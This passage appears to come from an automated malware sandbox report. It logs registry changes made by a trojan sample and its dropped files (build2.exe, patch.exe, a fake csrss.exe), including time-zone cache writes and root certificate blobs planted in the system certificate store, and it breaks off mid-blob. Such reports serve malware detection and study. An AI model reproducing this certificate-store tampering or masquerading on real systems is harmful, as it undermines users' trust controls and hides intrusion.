Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 406b124473ffd901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e3